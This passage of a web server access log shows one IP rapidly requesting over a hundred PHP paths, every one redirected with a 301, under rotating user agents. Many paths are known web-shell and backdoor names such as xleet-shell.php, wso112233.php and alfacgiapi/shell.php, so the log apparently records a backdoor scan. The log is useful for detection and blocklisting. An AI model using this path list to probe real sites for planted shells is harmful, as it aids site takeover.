Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 156.146.33.76 - - [16/Sep/2024:10:13:47 +0700] "GET /css/common_configuration.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:13:47 +0700] "GET /plugins/shell/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:48 +0700] "GET /css/dist/chosen.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:48 +0700] "GET /uploads/2023/12/themes.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:48 +0700] "GET /rest-api/class-wp-rest-core.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:48 +0700] "GET /odeobaim.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 156.146.33.76 - - [16/Sep/2024:10:13:49 +0700] "GET /widgets/moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 156.146.33.76 - - [16/Sep/2024:10:13:49 +0700] "GET /bx.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:49 +0700] "GET /php-compat/wp-config-sample.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:49 +0700] "GET /IXR/themes.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:50 +0700] "GET /maint/chosen.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:50 +0700] "GET /themes/twentytwentythree/patterns/web.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 156.146.33.76 - - [16/Sep/2024:10:13:50 +0700] "GET /themes/rehub-theme/moez.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:50 +0700] "GET /plugins/pwnd/2.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:51 +0700] "GET /wp-system.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:51 +0700] "GET /css/colors/blue/moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 156.146.33.76 - - [16/Sep/2024:10:13:51 +0700] "GET /pki-validation/edit.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 156.146.33.76 - - [16/Sep/2024:10:13:51 +0700] "GET /certificates/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:51 +0700] "GET /defaults.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:13:52 +0700] "GET /themes/ova-re.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:52 +0700] "GET /wp-widgets.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:52 +0700] "GET /uploads/2018/update.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 156.146.33.76 - - [16/Sep/2024:10:13:52 +0700] "GET /ID3/wp-css.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:53 +0700] "GET /Text/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 156.146.33.76 - - [16/Sep/2024:10:13:53 +0700] "GET /maint/wp-admin/maint/repair.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:53 +0700] "GET /controller/extension/wpm.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:53 +0700] "GET /plugins/ioxi/ioxi/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:54 +0700] "GET /ab.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:54 +0700] "GET /zoom_w.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:13:54 +0700] "GET /k.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:54 +0700] "GET /js/tinymce/skins/lightgray/fonts/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:54 +0700] "GET /beez5/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:55 +0700] "GET /wp-includes/images.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:55 +0700] "GET /pomo/9876sd.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 156.146.33.76 - - [16/Sep/2024:10:13:55 +0700] "GET /plugins/ubh/up.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:55 +0700] "GET /about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:56 +0700] "GET /loginform.inc.php3 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:56 +0700] "GET /customize/class-wp-signdown.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:56 +0700] "GET /bin/test.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:56 +0700] "GET /js/widgets/moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:57 +0700] "GET /beez5/moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:57 +0700] "GET /certificates/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:57 +0700] "GET /Requests/Utility/content.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:13:57 +0700] "GET /pki-validation/cloud1.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:58 +0700] "GET /mari.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 156.146.33.76 - - [16/Sep/2024:10:13:58 +0700] "GET /wp-content/plugins/rex/l/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 156.146.33.76 - - [16/Sep/2024:10:13:58 +0700] "GET /plugins/erin/yani/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:58 +0700] "GET /demo.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:58 +0700] "GET /js/mediaelement/radio.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:59 +0700] "GET /pki-validation/ws.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:59 +0700] "GET /widgets/include.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:59 +0700] "GET /random_compat/wp-conflg.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 156.146.33.76 - - [16/Sep/2024:10:13:59 +0700] "GET /images/install.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:00 +0700] "GET /languages/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:00 +0700] "GET /plugins/compat3x/css/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 156.146.33.76 - - [16/Sep/2024:10:14:00 +0700] "GET /pkivalidation/wso112233.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:00 +0700] "GET /maint/maint/ajax-actions.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 156.146.33.76 - - [16/Sep/2024:10:14:01 +0700] "GET /Text/Diff/Engine/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 156.146.33.76 - - [16/Sep/2024:10:14:01 +0700] "GET /themes/newstoday/lang.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:14:01 +0700] "GET /themes/gaukingo/db.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:14:01 +0700] "GET /plugins/file.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 156.146.33.76 - - [16/Sep/2024:10:14:02 +0700] "GET /0k.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 156.146.33.76 - - [16/Sep/2024:10:14:02 +0700] "GET /css/colors/midnight/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:02 +0700] "GET /acme-challenge/ms-default-constants_new.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:02 +0700] "GET /plugins/elementor/elementor-soap.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:03 +0700] "GET /widgets/class-wp-widget-tag.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:03 +0700] "GET /blocks/tinyfilemanager.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:03 +0700] "GET /ID3/radio.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:03 +0700] "GET /gix.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:03 +0700] "GET /lock.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:14:04 +0700] "GET /json.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:04 +0700] "GET /index1.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:14:04 +0700] "GET /fonts/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:14:04 +0700] "GET /js/a.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:14:05 +0700] "GET /pki-validation/delpaths.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:05 +0700] "GET /includes/xleet-shell.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 156.146.33.76 - - [16/Sep/2024:10:14:05 +0700] "GET /zwi-cofg.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:14:05 +0700] "GET /phpunit/phpunit/src/Util/PHP/as.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:06 +0700] "GET /map.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 156.146.33.76 - - [16/Sep/2024:10:14:06 +0700] "GET /plugins/elementor/wp-content/plugins/elementor/elementor.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 156.146.33.76 - - [16/Sep/2024:10:14:06 +0700] "GET /uploads/tp.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:06 +0700] "GET /uploads/dec.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 156.146.33.76 - - [16/Sep/2024:10:14:07 +0700] "GET /pki-validation/bless1.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:07 +0700] "GET /network/cl.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:07 +0700] "GET /wp-class.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:07 +0700] "GET /alfacgiapi/shell.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:07 +0700] "GET /random_compat/bala.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:08 +0700] "GET /wp-content/uploads/wp_live_chat/abruzi.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:08 +0700] "GET /addpost.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:08 +0700] "GET /plugins/fix/moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:08 +0700] "GET /service.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:09 +0700] "GET /uploads/options.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:14:09 +0700] "GET /uploads/2022/themes.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:09 +0700] "GET /includes/admin-all.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:09 +0700] "GET /bussubmit.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:10 +0700] "GET /network/class.api.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:14:10 +0700] "GET /css/dist/editor/fxp.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:10 +0700] "GET /themes/randkeyword.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:14:10 +0700] "GET /widgets/class-wp-admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:10 +0700] "GET /css/hm.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:11 +0700] "GET /maint/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:14:11 +0700] "GET /plugins/moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:11 +0700] "GET /block-supports/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:11 +0700] "GET /uploads/2014/07/olx.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:12 +0700] "GET /css/moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:14:12 +0700] "GET /upgrade/fx.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 156.146.33.76 - - [16/Sep/2024:10:14:12 +0700] "GET /assets/text.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 156.146.33.76 - - [16/Sep/2024:10:14:12 +0700] "GET /widgets/autoload_classmap.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:13 +0700] "GET /joomla/css.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:13 +0700] "GET /images/server.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 156.146.33.76 - - [16/Sep/2024:10:14:13 +0700] "GET /theme-compat/wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:14:13 +0700] "GET /classes/.secret/info.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 156.146.33.76 - - [16/Sep/2024:10:14:14 +0700] "GET /css/colors/coffee/xmrlpc.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:14:14 +0700] "GET /uploads/wp-conflg.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:14:14 +0700] "GET /IXR/themes-install.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 